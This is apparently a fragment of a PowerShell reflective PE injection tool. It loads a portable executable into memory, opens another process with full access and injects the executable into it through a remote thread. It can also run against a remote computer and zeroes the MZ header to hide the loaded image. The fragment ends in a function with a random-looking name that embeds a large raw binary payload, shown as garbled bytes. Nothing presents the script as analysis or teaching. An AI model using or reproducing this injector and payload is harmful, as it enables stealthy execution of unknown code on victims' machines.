- Write-Warning "Error getting DLL handle in MemoryFreeLibrary, DLLName: $ImportDllPath. Continuing anyways" -WarningAction Continue
- }
- $Success = $Win32Functions.FreeLibrary.Invoke($ImportDllHandle)
- if ($Success -eq $false)
- {
- Write-Warning "Unable to free library: $ImportDllPath. Continuing anyways." -WarningAction Continue
- }
- $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))
- }
- }
- Write-Verbose "Calling dllmain so the DLL knows it is being unloaded"
- $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
- $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])
- $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)
- $DllMain.Invoke($PEInfo.PEHandle, 0, [IntPtr]::Zero) | Out-Null
- $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)
- if ($Success -eq $false)
- {
- Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue
- }
- }
- Function Main
- {
- $Win32Functions = Get-Win32Functions
- $Win32Types = Get-Win32Types
- $Win32Constants = Get-Win32Constants
- $RemoteProcHandle = [IntPtr]::Zero
- if (($ProcId -ne $null) -and ($ProcId -ne 0) -and ($ProcName -ne $null) -and ($ProcName -ne ""))
- {
- Throw "Can't supply a ProcId and ProcName, choose one or the other"
- }
- elseif ($ProcName -ne $null -and $ProcName -ne "")
- {
- $Processes = @(Get-Process -Name $ProcName -ErrorAction SilentlyContinue)
- if ($Processes.Count -eq 0)
- {
- Throw "Can't find process $ProcName"
- }
- elseif ($Processes.Count -gt 1)
- {
- $ProcInfo = Get-Process | where { $_.Name -eq $ProcName } | Select-Object ProcessName, Id, SessionId
- Write-Output $ProcInfo
- Throw "More than one instance of $ProcName found, please specify the process ID to inject in to."
- }
- else
- {
- $ProcId = $Processes[0].ID
- }
- }
- if (($ProcId -ne $null) -and ($ProcId -ne 0))
- {
- $RemoteProcHandle = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, $ProcId)
- if ($RemoteProcHandle -eq [IntPtr]::Zero)
- {
- Throw "Couldn't obtain the handle for process ID: $ProcId"
- }
- Write-Verbose "Got the handle for the remote process to inject in to"
- }
- Write-Verbose "Calling Invoke-MemoryLoadLibrary"
- $PEHandle = [IntPtr]::Zero
- if ($RemoteProcHandle -eq [IntPtr]::Zero)
- {
- $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -ForceASLR $ForceASLR
- }
- else
- {
- $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle -ForceASLR $ForceASLR
- }
- if ($PELoadedInfo -eq [IntPtr]::Zero)
- {
- Throw "Unable to load PE, handle returned is NULL"
- }
- $PEHandle = $PELoadedInfo[0]
- $RemotePEHandle = $PELoadedInfo[1]
- $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
- if (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -eq [IntPtr]::Zero))
- {
- switch ($FuncReturnType)
- {
- 'WString' {
- Write-Verbose "Calling function with WString return type"
- [IntPtr]$WStringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "WStringFunc"
- if ($WStringFuncAddr -eq [IntPtr]::Zero)
- {
- Throw "Couldn't find function address."
- }
- $WStringFuncDelegate = Get-DelegateType @() ([IntPtr])
- $WStringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr, $WStringFuncDelegate)
- [IntPtr]$OutputPtr = $WStringFunc.Invoke()
- $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr)
- Write-Output $Output
- }
- 'String' {
- Write-Verbose "Calling function with String return type"
- [IntPtr]$StringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "StringFunc"
- if ($StringFuncAddr -eq [IntPtr]::Zero)
- {
- Throw "Couldn't find function address."
- }
- $StringFuncDelegate = Get-DelegateType @() ([IntPtr])
- $StringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($StringFuncAddr, $StringFuncDelegate)
- [IntPtr]$OutputPtr = $StringFunc.Invoke()
- $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($OutputPtr)
- Write-Output $Output
- }
- 'Void' {
- Write-Verbose "Calling function with Void return type"
- [IntPtr]$VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc"
- if ($VoidFuncAddr -eq [IntPtr]::Zero)
- {
- }
- else
- {
- $VoidFuncDelegate = Get-DelegateType @() ([Void])
- $VoidFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VoidFuncAddr, $VoidFuncDelegate)
- $VoidFunc.Invoke() | Out-Null
- }
- }
- }
- }
- elseif (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -ne [IntPtr]::Zero))
- {
- $VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc"
- if (($VoidFuncAddr -eq $null) -or ($VoidFuncAddr -eq [IntPtr]::Zero))
- {
- }
- else{
- $VoidFuncAddr = Sub-SignedIntAsUnsigned $VoidFuncAddr $PEHandle
- $VoidFuncAddr = Add-SignedIntAsUnsigned $VoidFuncAddr $RemotePEHandle
- $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $VoidFuncAddr -Win32Functions $Win32Functions
- }
- }
- if ($RemoteProcHandle -eq [IntPtr]::Zero -and $PEInfo.FileType -ieq "DLL")
- {
- }
- else
- {
- }
- Write-Verbose "Done!"
- }
- Main
- }
- Function Main
- {
- if (($PSCmdlet.MyInvocation.BoundParameters["Debug"] -ne $null) -and $PSCmdlet.MyInvocation.BoundParameters["Debug"].IsPresent)
- {
- $DebugPreference = "Continue"
- }
- Write-Verbose "PowerShell ProcessID: $PID"
- $e_magic = ($PEBytes[0..1] | % {[Char] $_}) -join ''
- if ($e_magic -ne 'MZ')
- {
- throw 'PE is not a valid PE file.'
- }
- if (-not $DoNotZeroMZ) {
- $PEBytes[0] = 0
- $PEBytes[1] = 0
- }
- if ($ExeArgs -ne $null -and $ExeArgs -ne '')
- {
- $ExeArgs = "ReflectiveExe $ExeArgs"
- }
- else
- {
- $ExeArgs = "ReflectiveExe"
- }
- if ($ComputerName -eq $null -or $ComputerName -imatch "^\s*$")
- {
- Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR)
- }
- else
- {
- Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) -ComputerName $ComputerName
- }
- }
- Main
- }
- function Invoke-HGFXNPCQTZ
- {
- $PEBytes32 = "MZ                @                                       	!L!This program cannot be run in DOS mode.
$       zzz$z$z@zzz
$z
$zRichz                PE  L [w\         !
          6                                       @                             (                             P                                                                                .text                             .rdata                         @  @.data                        @  .pot5s8                       @  .reloc  P        ~             @  B                                                                                                                                                                                                                                                                                                                                                                        UuR@  PuE  ]UE@3@]UEp<  Y3ɣ]UE@3@]UE@3@]UEVpF<  Yt'e EPV<  V  39^]UE@3@]UEVp;  Yt'e EPV0<  V  39^]UEp;  Y3ɣ ]UEp;  Y3ɣ]UEVpu;  YtDSWE3PV};  V  u3} ujY 3GS  Y_[^]UVuWhvj WC  th  WVD  _^]UEp:  Y3ɣ]UVuWPvj WB  th  WVRD  _^]UVuWDvj WB  th  WV D  _^]UVuW8vj WWB  th  WVC  _^]U0VE@Pjj
h  Vw;  EE Pjj
h  V;  EE PjjhH  VI;  EE EЍEjYE܍EEEjPuMET ME" ME C  H^]UVuW\vj WA  th  WV"C  _^]UE@3@]UQSVE3P|*  Yt1W3G9}~u4=  YYuG;}|S:*  Y_^[]U\V3E8WEDEPE\Eht?  GYrEEEE EEEEEġEȡE̡EС Eԡ$Eء(Eܡ,E0E4EDt P'  YFr_^]UH  S  3  !VWSǅ7< ǅ< %=  PSP  uuS~'  Y  EPjj
h   h@8  EE Pj_Wjj*h@8  EE PWjh   h@8  EE PWj	h-  h@8  PE EPWj h   h@8  EE Pjj h  h@s8  EE Pjj h   h@X8  EE PWjhi  h@>8  PE EPWj h{  h@!8  EE PWj	h9	  h@ 8  EE Pjj
h  h@7  EE Pjjh  h@7  PE EPWj h2  @W7  EE Pjjh  W7  EE 3EǅB GEǅ # E䉅EEȉ(E4EjY@EjZLEԉǅ ǅ   ǅ  ǅ$ ,ǅ0  ǅ8   ǅ<R DǅH PǅT, XEǅ dEpEjZ|EEjPV\hǅl tǅx MEq UE^ >  uP  Sw$  @u 3Q  	  @EPjjhV  S5  3fEEPjjh]   S5  3fEPj
j
h  S5  3Pj h f4  H)  uEP)9  Y    uEP9  Y=&  uEP8  Y'   uEP8  Y (  $uEP8  Y$  MDQ8  Y()  ,uEPo8  Y,EP%  kMj QV3  V0"    V       Pjjh  SY4  3fP,@  = tu= tl= tc= tZ= tQ= tH=  t?=$ t6=( t-=, t$=0 t= t=  t	= u3_W5$(Wj =  ; t3_V5$!  YtV5$Wj h X?  ^U(S3   !EW}ܫSE7< E< 7  PESPω  u
Sm!  Y3^VEPjjh#	  h@2  EE EEjPWE   EK P;  EWP轕  S!  ,3ɅD^[]U8SVWEȾ@Pjjh_  V{2  3fEEPjjh   Vb2  3fEEPEPEPEPh  
,  <P  uEPEPEPEPS
  t}   t Vd   Yj
j	  YY"FPWL8  YYVt@   j
j	  uQ5  E   PVEEjPEPh    uuEVjPEPS
  FPW#9  YY_Ul  SVWEл@Pjjh_  SH1  3fEEPjj
h   S/1  }3fEEWPEPEPh    <u WEPEPEPh    t
}
     V  Yu 3   Ph:  j
h   h@0  3fEΡP5055,5(5$5 5555555h  PVS\WS-4  YPSh <  S|  ?7EVjPEPh  ;  u7EVjPEPh    _U   EVPIYe  WjuV.  V  u 3B  E@Pj
jhB  Vp/  3fEƍEPj
j h?  VW/  3fEEPj
j	h  V>/  3fE|Pjjh  V"/  P3fEdPjj h(  V/  3fxEPjjh  V.  3fEEPjj
jYV.  3fEEP51  D}ԅMEE
EȡE̍EEЍEEءME܍Mȍ|EdjQ5E Ec/  W  3@^]UEPj
jh9   h@#.  3fEEP2  E   P"  4t\VPjh N.  EP54s0  541  54|w1  tV0  PhDU5  V
  ^]U@EVPY   WjuV,  V  u 3   E@Pj
jhB  VF-  3fEEPj
j h?  V–  3fEEPj
j	h  V-  3}fEEEEčEEȍE؉EСEԍEjP5-  HP0  Wt$  Y3Y@^]UVEPj
j	h  h@,  3fEEEEEjP5 w-  P b0  5 x0  (tV.  PhD3  V  3@^]U   SVWE@Pjjh_  V,  3fEԍ|Pjjh  V  3fEEPjj h*  V
  3fEEPjjh   V  P3fEEPj
jh  V
  3  fEEPEP|PEPW>%  ؍w(]uEPEP|PEPV%  EEPEPEPEPW$  }؅uEPEPEPEPV$  E؋EPEPEPEPh  $  ؃uEPEPEPEPV$  ؍EPEPEPEPh  x$  uEPEPEPEPh  U$  EjYtu} uo9Mujtf} u9Mu[tW}XuQ9MuLtH}XuB9Mu=j Ph   j Wh   jXS@W  jXVh  0  \h P3  j _E}PW\}Ph 6  ؍EPW\Ph 6  \WP|6  0c  [  u@SW   uVh  u|h jPEPh  #  0u"u|h jPEPh  #  uEh jPEPh  d#  uuEh jPEPh  A#  uEWjPEPh  &#  uuEWjPEPh   #  uEhjPEPh  "  uuEhjPEPh  "  Et P  YE؅t P  YS  V  j uW'  3_^[]UQ} u3xWuu*!  YYtc}   SP#  ؉]YtJj.Xft>CVjj    j	YjXEQj    fu f[ű]^[_]UVuF$P*  Phh-  t(vj jtj VxV  Y3@3^]UEVPYt9Wu	  Yt!EPEPuVWIA  W  t Vy  Y_^]Uu   u   3Y@3Y]ULSVW}W*  |E   P  YYt7WV*  54VC)  V3ۃV  Yt 3   u   W(  V(  Eܻ@Pjj h  S[&  3fEEPj&j
h  SB&  3fEڍEPV*)  8tbEPV)  YYtREPWp*  YYt.EPjj h  S%  3fEEPWG*  Vh8:,  YY@3@_^[]UEPj j uǀL     S9  ]UVuj@  PU2  VM9  Vu8  ^]UQ} SVW    |9]s]}X  PW8  YY!  u/jd   X  PW8  tىP  ]E   ;3]  UJUtRu StAth   St-jj h   uuSV8  tV   Y_^[]VW8  Y3UE@SVWjYx(@jY      ESP|-  EPEh P/  Ej P 1  uEj@h   P  WGF  Ej P0     jV.  VW	F  Dj Sj <.  Mj         PPW,E  _^[]USVW}wh  wg '  E   P  t.5wV&  YYP&  Pw@;  w  wG EG$}E5ދߋʉUȿ};ƋEu;Uuϋ5ރUʋƃ };u;UuWuNYY_^[]UEVuWP  T  L  WV7  (9  =  t-&tjd  P  WV6  t
VuYY_^]U<EV3hv, VVP55555P5     EuĉEԍEPE.' E/ uЉu܉uuuE' E. 9  Y95tEVPa:  YY;Ew sjd&  Y;Erw ;ErEhP4  Y3Y@^]UV^  utfj uu5  ML   t:ttuNQVCjQ   9PuQ[   	jQVN  &u
uVYYYjEPEPEPV4  = ]NU  3^] UVuWuT  W  WPB  EL  EؙRPV5  uWV5  (   =  tjd  uWV4  t_^]UESVuWL  = t%N$F |   ;v+ QPV4     ~(SWV4    =  tjd\  SWV4  t_^[]VW  mtg39=um  t W  Yhn& WW$    9=t   )t#I
  9=th& Wj;5B     _^UVWu}uuWt=S3SvWy1  VuWYY3SSWL  2  uV3@[_3^]UE
Eu3]u\!  uhDP%  uu5  YtPhP1%  YYu3@]U<SVW3EPuu VVjVjh   udE   MVVVjVMMPM؅   U;|pM~gEE;
|;sMMPuQh  StJuVW  W<EEMu+ȋU։MU;|;w3FtW<]t S}   YEt Po   YuD_^[]UT  Vu!  E   P
  YY	  SW@Pjj	h	  S  3fPV   uV  h V  Pjj
h]  S   @3fLPjj
Wh  S  3fXPjj[Sh  h@  3f*PjSh   h@  3fPjj	hk  h@  P3f
EPSj j|h@s  3fEEPSjh3  h@W  3fEhPj
WhK  h@8  3frEԍLE؍E܍EEEEEE썅hj j E  DtVl  h Va  <PjShl  h@  3fHPjj	hP  h@  3f\Pj
j
h
  h@m  L3ffEPSjh  h@K  3fEEPjWh  h@/  3fE΍PjWh  @W  3f,Pjjh  W  P3f8EPSjh  W  3fEtPSjh  W  3f|<EЍEԍ\E؍EE܍EȉEE䍅,EESE3ۍtSEi  tV  h V  @j	SG  YYt;jzja7  jzjafE*  fE3fEEPV  j	SG
   @;rh V  E@Pjjh(  S  3fEƍEPjjj?S  3fEEPjjh  S  3DfEEEEEEjj E  tV  [^]UVue  |E   Pk   YYtEWuV  54V  jjj h   @V/  V   (u3
W  3Y@^]UQVu  xE   P  YYt_WuV'  5 VW  j jj h   @VN/  V   (u3$EPtP5WI/  W4  3@^]U} t#u  Ph\  t	u|   Y3@]33@Uuuun]3@U0V3EԨ5 EЉuPE5 u܉uuuuuE5 E5 /  EVPL0  ^]U03E5 EЉE܉EEEEEEPuE5 E5 E5 ,  Y3Y@]3  jd  t
j N  Yt  P3  Y  I3  3 Umu3PPPh6 PP  P 3@] U,EVPj^Vu   EESW3Gf;u&j[f;vj[f;vj[f;vf;wj(j [Ǌ(   Pj@j(   E؉FE܉FfEfFfEfFXf;s ~ F3 ˙ ~~$FPWF؅   NWVSQWuu   Wh   jWWh   ud   BM  fEV Nj E3EN EEPjEPWtj EPF (   PVWuWj EPvSWWu#  Y
  YS_[^]USj
jT  YY   ]
   WPI  Y   e Vt8jj   j	YjXEQj   Mfu fOAM;rȍEPjjhx   h@  3fEEPWP  Q  ؅uW  3S  W  u   P  uW  S  YY3SV  WV  ^[]U4Sj ؉]  VSu  WjSj XPS}EPWSEE  PVjZSjHPj$3QQjQQjQQQQQQQPEE܅G  PVjVXh VjUe e PẺ}PVUMǙ}   3E   ރe ~hjj @  3ҹ   jj (  jY3j
j   u3jY
PVuSMFu;|}E@E;|]uEؙ+ȋE+j+ȍE+MPj5MVD;t!WSuvjWj jW   YuuV_Sj $^[]U} u3]ujul]U}    j EEPj T]Uu(]Uuj u]U= u/j h   j Tu
   uPYYY]Uu5YY]UEVutUW
Bu_^]UMtEViW}΃_^E]UHVE  E"  E#  E(  E
  E,  E7  E?  E@  EB  EC  ED  E  E  E,  EC  EZ  E(  839tt9Lt
@r33@^]UVuW}6G$P[  YYt3	GF3@^]U} t	u]Uu<]UuP|]USVW}3E}  3S[]Es@KSE}}|ʋE_Ut  VE(Pjjh  V  3fEPh$  j
h  V  (E<   33fEuE̍EEԍuЉu܉uuuuuuuuE^EP|t]Uuh]Uu]UQVj Yt!EE   PV@u	V?Y3^]%LUSVW33jZU3_t&   kPЉUY   E03
 $ MEf;wlkzEPPE3%  Yt8t0fEfGEGGWPEPEP0u
 GGGFfEjZf@YfEf;vQ_UC
FE  _Ue EPjut%EPjEPju0u!E\YE]U   SVWl(PjdjhW  Sy
  3fEЍEPjj	h  S  33fEEPE}PEPlPh     <u3C}t	VYf9>u-EPjj h  S   3VfEEP  _UTEWPju3t:EPjLEPju0tVuVtF|^u@Y_]UXVE(Pj6jh  Ve  3fEލEPjjhG  VL  3!EfEEPEPEPEPh    <^t
}t	P}Y3]UVW3jGYt=S]WVu;uVEG?PYYu
u	V'Y3[^]UXWj"Yt}V  EEjPh9    j@Ej PEPZEPjjh   h(X
  03fEEuP2  PEPV{  PEPW^]d0   UQQEMEEh= Pj]  E]U|VE(PjXj	h=  V
  3fE܍EPjjh   V
  3!EfEEPEPEPEPh  ^  <^t
}t	PY3]UQVh  Yt!EE  PVu	VY3^]U WEPjjhc   h(
  3fElP(Y= @  ueEPYPj h   u3FEPh Wu	WyYVuLWdu\Y3Y^3@]lPY= @  u%3Uu]UQSVW-3EVVtFQZYt4SWt!~MP%   tuF;|SmY33@UE,wVE $NE 3@]3]ËCE HE                  U$EP3f}	]%Uu]UQQEWP.Yt}V3F9u
W<3hS39u~V4/  CFY;u|j^t=P.Yt"9u~4S
  h( S
  F;u|W<	W<3[^]U$EP E]d
0         ff
U,  VW3Wju3Pǅ,  PV)PuUYYt} uPV uVY^]Uuuu  YYt3@]uuM   YYu]  UVu;uv3.EjP  YYtEƍHu }DȋE3^]U= SVu:W3}@3S[ wOWE   @jYE
_t39Mvu3rB|3È1A;MrUQSVE3PjSuuuUW}WSuSuuu19t-7
YtWVuSuut	V4Yu _UQV3EVPVjVVVuuu'uuuVuuu3AD ^]UXVEPjVjh   h(I  3fE3EPVVt=   uF^]55YU= u&h   jj j h\u]   uu5]Uu]UQV  3t(3fFQQQQEPQQVV!EEY^]Wj j \u_Í?VP`YtVW\u	VY3^USVuE3f]WufE@   -GaЉEff2f3f3ff]fËMff3f3fmf}tuE뱊E^$[]UQSV3W9uv-23EP.   Yt%E
GrEF;ur3@_3USVW31   1
ƋʉEωM   M1U
ƉE׋}wIrwBw>rw7Ǚ33
Ex!@rQuEYYM2uC   t3_ËE3@Vj4j;t^ULVl   f;   VxY   VpY= 0     SWE3PS$YYu SEPj
j h   h(  E<   3]fEEEEuĉ}ȉ]E   ]ԉ]؉]܉]]]]EP|tVWYYS_[^]Wj j u_Í?VPYtWVu	VY3^USVW3SSjuSS4t,?PIYtWVjuSS4u	VvYUSW}E3SSPSjSut:VuYt)SSEPVjSut E 	VY^[]UW3   @9EEEPj Wuu,t5EVPYt!EPVWuu,u	VY3^]UU  	k!B
u]UU  
k!R
fu]UUUuMu
PQR
  ]U39Uv0MVu2, I2B, A;Ur^3@]UVW}}   PYt@SVWuVVu3PSuS3@[^]UQe EVPEPu  "VuUE3PEPEEP  u^]UVuW39}v,S]t4V!   Et
V,uYG;}r[^]USVW}   ]   }    S  uE{  SWE3     }xFSP  YYu}tWC  MME   PDEYYtXEEESNWui  
VWu  upQG  ME΋uE<OuWP(  EYY3_UEȀ8 tA|
Z A9 u]UEV3f90tAr
Zw ff91u^]UVuuV]  YFQ   YY^]UUSVuu
tBtUUVuW:
uft:
t_^y3@Oȋ]Uu   @Puu,E]Uu   E   PuuE]U} u3]WuZ   @PYYt
uWYY_]U} u3]Wu8   E   PDYYt
uWqYY_]UE@uEH]UEffu
EH]UMVW}t-U:f ftutt
3f_^]UU3S]f9uKVWft=
ftft17u
3f97u3f9tfu3_ËUEuE SV3W}ft.ftf;t
2fu3f92t
fuՋf90t<ft0uf;ut
2fu3f92u
f90u3fU_USVW3SSSSjuSSt
WYtSSWVjuSSu	VY_UVuW39~vGSF3Ë[Et
QEYHt
QoEYP6 YYuG;~r[v66^]UVuYM3qA4u6eYYtvu3^]3@UVujYM3qA4uvhYYtvu3^]3@UVu'uY3tCU9w
@rE FPQFYYt3@
6Y3^]UQWu}WYYt 3   Vu3wj7U~t\u/Yt'uKFYtGMFG43@(> t6Y~ t	vYV7cYY3^]UQWu}WYYt 3   Vu
3wj7Ut\utYt'uFYtGMFG43@(> t69Y~ t	vYV7YY3^]UVW}39wv!GxuppuUF;wr3@^]3USVuW39~vr3ۋFDE3ME9E~MEE0QYYuUMB;AtMEAME;M}MkEMRTYtG;~r3@3UuH   Yu]uu    Y3Y@]U Wj Y3E	}fEPuu   _]UVuj Vq  YYtF&$?@F3@^]Uuuu*  ]U  uuPR  tmVuW}𥥥}tBS]EPEPP  j^;EBVPS  E
 uHu[h   P  YY3@^]UMUхtVuWJj3F_@% 3ȃuu_^ы]UDEj0PHYYu3PEPjj	h  h(KEE P-PEPj0EPh
  ,tEj0P  Y3Y@]U0= VuwttVsY   SV=   Yv(Ej0PYYt*j j j0EPS  tuuS  u3
V3Y@[^]U EPuuj EPj uVJ  Ej P  $]UEHE uH]UEVutW}
0
Bu_^]U  SV3Wƈ@=   r3Ҋ=uE5=G5   rË]3ƅtaM}M@ȉM
5
5
ȋEɊ
2 @EEuE_Uuj u]UEt  W}u 3   G8SPEY   # CVWuPWEPEPEPuEPFEj PEjPwVSEPEh   P@DEj POVSj EEuj
YMUUj
Xi  B
u]UV3  Y0  rEPjj
j[h(E EP  P^]UEPjjh  h(E EPh6\u  YЋ]UEPj
j	h#  h(E EPh6\<  YЋ]UEPj	j
h  h(LE EPh6\  YЋ]hүw   YUQQEPj jh   h(E EPh6\   YЋ]hG93   YUEPj	jh<   h(EE P  ]UQQSVWPU
;tQ}>mG Y(jXE3ft-ЍF[fw i  3fuމUUE;t	;u3_ËAU  SVuv  3u  W;wUtL_t@	t4{t(-   t-   tuW_ oA\ hZ_ a\ Z<] S_ L\ E-  t9-p  t
?tnt-   u ! E z\ 0] \ ЋtQO< 3ۋL9xϋA$Q ǉE׋AǉUEAEtP% Y;tUC;]r3_^[]ËEMXUEPj
j	h  h(E EPh6\YЋ]UEPj
j h  h(E EPh6\\YЋ]UEPj jh  h(lE EPh6\#YЋ]UEPj
jhu  h(3E EPh6\YЋ]UEPj	jh   h(E EPh6\YЋ]Uuh6\Y]UVuj uvuh39F^]UESVW3    uv"SSSvG;rjdY9^u6Kv YY_^[]USVu3W^av(SSVuSStFPYG8;r3@_^[]3UVuuYu3Duj j jhFu 6YuVmYYu6vQY3@^]UEu0AYY]UEu0uYY]UuEuuup]UuEuup]UVuvvYY^]UVu3Ph   Hu FPuFuudFu3*uFYu
vYEF EF$3@^]UEPj uup8]UUJMBEJB]UEPj uup]Uh  SVu3W}PVE]EEWYY  EVP  SVwW(GW  E
Et?3Vb[]6bV\EME
Mu!Eu3@\  V$H VEIYYPVpE
  h PYY   h@ PdYY         PEFPYYt@hL VPVWtaEVP  PVwW(GW>PE荅SPVWtu荅SPVwW,G W$? uPuPu]? k[6VYYu_^[]Uj uuj uuud3ɃD]Uj uuuu]UEjY;@]UVuTf>.uVYvF3^]UVh  YtQEPjj he  h(3fEEPV EPV/hL V$uVV8^]UVjYt1uf YMA
AtAp13q@AQ ^]Uuu,]UVh  +Yt{WEPjjhC  h(3fEEPV:jZ_:w"uVXFYYarzw	%  fFfF3fFVf9~vY3@_^]UEPuj jjHt 3   M @  WPEmYu u3uSVEPWEPuEu<39]vw~uu6#YYFtFPulYYC ;]rыE=  uWBYu^@[_]UTSWE3PjS]   VA9]tMuYt-E]PuVutESuVPQVYEPuuEUjRPQ0uI9]tDESSSSPQu3u5Yt$MEuPV1MWQRt	WZYEPQ^_[]U\  VWPh   jh  h(33f4VVVVP3}  fE3ɍEE<   PVVuAuuuĉuȉM̉uԉu؉u܉uuMuuuW3t  M3ҋESVfAuuW؉]uWaEf90uj/YfEPjjh  h(3}   fED    PVVVuEPS ؅uWu3   8Pjrj h  h(3fEVu8uujPS u.=/  ujEE 3 PjSpjXEuEVS0}t@VEuPEE   PVh   SM#E=   u uSYYWuS[_^]{US   u]SVtP     PW 6  Wj@h 0  Vj tVSWu_^[]U  Wj	   3fEGXfE3fEj
XfE3EEEPEPPu 3   N  f;vEP   h  xPtSVxhL PVxPx(CEPjjh  V3fEEPjjh  V{34fE3EEEĉEEPj t䍅xPYYP@tEPEP3ɅI3Ff|ua  f;v V^[_]UuEu0P  ]UVuuuFP
  3ɉ^]U@S]W39  u 3{  }   wVut@0F  VuEPj0X;t+PEWPEPSA  YYj0EWP9  u)   jV  PVSǃ     Er_uu   jPV   PS  ;u
Gu   EEu3ur맋MMtP   jVPEPVS  U;uGu)uuEPu      v3A   MQS  Y3Y@^_[]U Wh   j ujY3}EPh   u
uuuuuP   ,_]US]VuWt,   j ;j GWSut߸   +u3@_^[]3U03VuWj0_;w\9}uWtVuEP;t+PEj PWuEP	uEPV   3@   3_^]U0S]VW3   jWEPWS0rj0uEPEPh   Suǃ     _^[]UDVu   S]M+EE+WEuE3P   EYY@ u@$@v2]׋}Mj@
2BX;r]+EEE]뭅t"EM++ىEMϊ2G
E;r_[^]UUMBAb  b$ B]U}   MUVBABABABu PB,AB0AB4AB8FBFB(F5B<^]UtSVuWjY}E
   E}MȋUċu]EEEEEEEԋEE؋EEEEEE܋EEEEE}ЉEǋ} 1EEE	1EEE
3Eǉ}1EEE 1EEE	3}؋E
1EE1EE 3ЋE	1EE
3Eǉ}؋}1E
 3}܍}	3Eǉ}
3؍3ȋEE 1EEEE	1EEEE
}3Eǉ}}}3EE 1E؋E؉EE	}}}3Eǉ}
1EEE}}3E}}} 3؋E	1EEE
3ǉ}}ЉEE1EEE 3}Љ}9	3>
3Ѝ23ȃmEJ]E]U3҉M؉uDDB|}ujY_UMSV    ##
ЋAW}3U##
ЋA3W%  U#
؋A3_%  #
ЋȋE3Wp3pE3p3p3OMȋp3pE3pE3p3OMȋEp3p3pMMu34pƉu3GpEE3p3p3pE3O E  uȋEpU3p3pE3p3EMȋp3pE3p3p3OEMȋpM3p3p3p3_p3pE3p3p3WȋEp3pE3p3p3OMȋp3pE3pE3p3OMȋEp3p3pMMu34pƉu3GpEE3p3p3p3O mM	E   ]UpE   p%   3ȋp%   3ȋEp33  %  
EpE   p%   3ȋEp#3p33O  %  
BEp   p%   3ȋEp#3ȋEp33O%    
BËpE   p%   3ȋEp#3ȋEp33O  _%  
^B[]US]  VuW%  #ʍ~
ȉK#  
 K#  
FC  %  
Ё}   V   »   p   #ˋp%   3ȋp3p%   3ȋ 33NNF3ȋN3FtOp   p#3Ћp3p%   33W3W 3GO3ȉOG3Guj
X
  K%    
FC  %  
Ё}   V
  »   p   #ˋp%   3ȋp3p%   3ȋ 3t3NN3ȉFF3N F$(N3NF3FvNp   p#3Ћp3p%   33V3VF3FN3ȉNF3FsjK    #
FK#  
}   Fz  Et   p   #Ӌp%   3Ћp3Np%   3Ћ 3   3V F$V03ȉUF3N(F,   Jp#p#3Ћp#3p3ЋE3P@3UJB3ȋB3JB UJp#p#3Ћp3Mp#3ЋE3P3P@3UBJ3ȉJB3BEE=j3_U  SVW   W3VPW3ۉ<@CVP8ѿWVP跿@WVP覿E䍵8u܉E3@WE􍅨VPrh   VPTHWVPCh   xpVPt%uEEEpEEjYXE    ]ԍ]܈EE    VWQS  VWuu  uuuuSuuuu
  DVWuu  VuW}VWp  MË] E׋EEEEEEEUmMuEe]܋]Km]Bu܋}jY}jY_U  VWuP	  PP  PEP  uEPP
  PPpP
  pPEP  PEPP
  DPEP  EPPo  PEP_  EPPO  PEP?  PEPPJ
  PEP  EPP  Dj_PEP  EPP  u؍PPP
  PEP  EPP  j	^PEP  EPPx  u؍PPEP{
  EPPI  PEP9  EPP&  PEP  u؍PEPP
  PEP  EPP  j^PEP  EPP  u؍PPP	  PPz  PEPj  j1_EPPT  PEPD  u؍PEPPG	  PEP  EPP  PEP  EPP  u؍PPEP  EPP  PEP  EPP  PEP  EPPs  pPPu  @_^]U  j uEPEue$?@EEP
  EPEP8PP8PEPEPP8P  8Pu	   @3]UU@3ɋʉDA
|SVWj_3ۋLt#ڋ#ڋ)TDC	|ƋM#ڋkUMЉUuʋ#ً)MĉU3ҋDt #%LĉDB	|؋Eȋu#Ekuu  3C҉]]tWhtX  #CYY
|]%ut#%)DC
|EEEEE؋uEEEEMEEUĉEF]FFFF F
N
ӋMF
F
VUF


ʈFNMԋFVUN^	F
FFNMF
шFVUF
FNMF
_VFNUUVuWj

DB
RBu_^]US]VW}CC

3
C

O7C$ ȋC

C

ȊC

ȉwOC	$ȋC

C 

ȊC

OwC$?ȋC


C


ȊC	

ȉwOCȋC

C


ȊC

ȉw$O CC

C3
C

ʉw(O,C$ ȋC

C

ȊC  

ȉw4O0C$ȋC

